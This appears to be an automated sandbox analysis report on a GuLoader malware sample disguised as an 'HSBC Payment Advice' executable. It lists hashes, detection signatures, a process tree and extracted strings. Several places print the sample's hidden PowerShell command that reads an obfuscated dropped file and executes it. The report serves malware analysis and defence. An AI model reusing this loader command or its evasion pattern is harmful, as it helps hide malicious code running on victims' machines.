
Windows Analysis Report
HSBC Payment Advice.exe

Overview

General Information

Sample name: HSBC Payment Advice.exe
Analysis ID: 1533042
MD5: b9138cef86a6c7324bec281bb7fa3e00
SHA1: 0d8d3ec170c54904dd6c7f87e6f8418810f8ecfb
SHA256: b3eedff35f3202a6614d84582160de6b56c0bcd26f698c34b17d03c20d923c17

Detection

GuLoader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Suspicious powershell command line found
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • HSBC Payment Advice.exe (PID: 3048 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: B9138CEF86A6C7324BEC281BB7FA3E00)
    • powershell.exe (PID: 2088 cmdline: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 6780 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5948 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7952 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4892 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4496 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6812 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7120 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6392 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7340 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1716 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 544 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7920 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4088 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4400 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5972 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7688 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5524 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2712 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1676 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5396 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5956 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 2384 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4092 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2216 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5676 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1620 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7272 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1056 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2408 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1900 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1444 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 4384 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2344 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2784 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8200 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8208 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8216 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8224 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000002.00000002.91928114130.0000000008F22000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

    System Summary

    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) ", CommandLine: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe", ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 3048, ParentProcessName: HSBC Payment Advice.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) ", ProcessId: 2088, ProcessName: powershell.exe
    No Suricata rule has matched


    AV Detection

    Source: http://pesterbdd.com/images/Pester.png; Virustotal: Detection: 10%
    Source: http://pesterbdd.com/images/Pester.png4; Virustotal: Detection: 10%
    Source: HSBC Payment Advice.exe; Virustotal: Detection: 21%
    Source: HSBC Payment Advice.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Binary string: CallSite.Targetore.pdb) source: powershell.exe, 00000002.00000002.91926000124.00000000086E1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000002.00000002.91926485061.00000000087A0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbn source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: HSBC Payment Advice.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png4
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.quovadis.bm0
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester4
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052D1

    System Summary

    Source: initial sample; Static PE information: Filename: HSBC Payment Advice.exe
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_00403358
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_00404B0E 0_2_00404B0E
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_0040653D 0_2_0040653D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_0464EC28 2_2_0464EC28
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_04649AE8 2_2_04649AE8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_0464EC18 2_2_0464EC18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_04641D00 2_2_04641D00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_08E01AC8 2_2_08E01AC8
    Source: HSBC Payment Advice.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engine; Classification label: mal92.troj.evad.winEXE@4590/16@0/0
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045C8
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; File created: C:\Users\user\AppData\Roaming\daaselatteren
    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:304:WilStaging_02
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; File created: C:\Users\user\AppData\Local\Temp\nsdD9B9.tmp
    Source: HSBC Payment Advice.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: HSBC Payment Advice.exe; Virustotal: Detection: 21%
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; File read: C:\Users\user\Desktop\HSBC Payment Advice.exe
    Source: unknown; Process created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: unknown unknown (33 identical entries)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
